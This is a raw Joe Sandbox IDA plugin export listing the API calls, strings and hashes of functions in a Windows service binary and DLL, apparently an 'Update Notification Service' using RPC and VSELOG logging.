Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

10:52:57, xrefs: 000000014000120F
Help, xrefs: 0000000140001238
Jul 5 2019, xrefs: 0000000140001216
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFE11EC4CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE11EC4E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE11EC519B

Strings

csm, xrefs: 00007FFE11EC4E99
csm, xrefs: 00007FFE11EC4DB9
csm, xrefs: 00007FFE11EC4E1B

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 52cbce0f79a48d9e9333070a255942142f24160999e500bc69c8ed3422045241
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: B9E1B132A08F828AE7109FA6DC443AE7BA8FB45768F544175EA8D47666CF3CF581C740

Function 00007FFE11EC95BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE11EC8BC9,?,?,?,?,00007FFE11EC8C14), ref: 00007FFE11EC95CB
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC8BC9,?,?,?,?,00007FFE11EC8C14), ref: 00007FFE11EC9601
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC8BC9,?,?,?,?,00007FFE11EC8C14), ref: 00007FFE11EC962E
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC8BC9,?,?,?,?,00007FFE11EC8C14), ref: 00007FFE11EC963F
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC8BC9,?,?,?,?,00007FFE11EC8C14), ref: 00007FFE11EC9650
SetLastError.KERNEL32(?,?,?,00007FFE11EC8BC9,?,?,?,?,00007FFE11EC8C14), ref: 00007FFE11EC966B

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 9f19e6069425d2570a4a2073e01fe50ebdbe72e7a14307ef08023bb8cdc09553
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: 23114A64B0CA4286FB5463B79E5127F219AAF447F0F8457B5E83E067F6EE2CB4428200

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFE11EC7F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFE11EC7F4D
GetProcAddress.KERNEL32 ref: 00007FFE11EC7F63
FreeLibrary.KERNEL32 ref: 00007FFE11EC7F8A

Strings

CorExitProcess, xrefs: 00007FFE11EC7F5C
mscoree.dll, xrefs: 00007FFE11EC7F44

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: dd429b983a3199e580caded64b262817e674ead132038f13604d96c4d362e490
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 7EF04F65A19F4381EF108BA6AC8433B6369AF857B1F941375DA6D462F4CF3CE489C340

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

CorExitProcess, xrefs: 000000014000852A
mscoree.dll, xrefs: 0000000140008518

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFE11EC40D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFE11EC41F7
__AdjustPointer.LIBCMT ref: 00007FFE11EC4242

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: 619b1a766ad019394638e7ab0a9677b976e24bfdbe07b3689e8d048c4613a17d
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: 93B1C022A0EE8281EB65DB979C4177B63D9AF54FA0F8988B5DE4D077A5DE3CF4418300

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

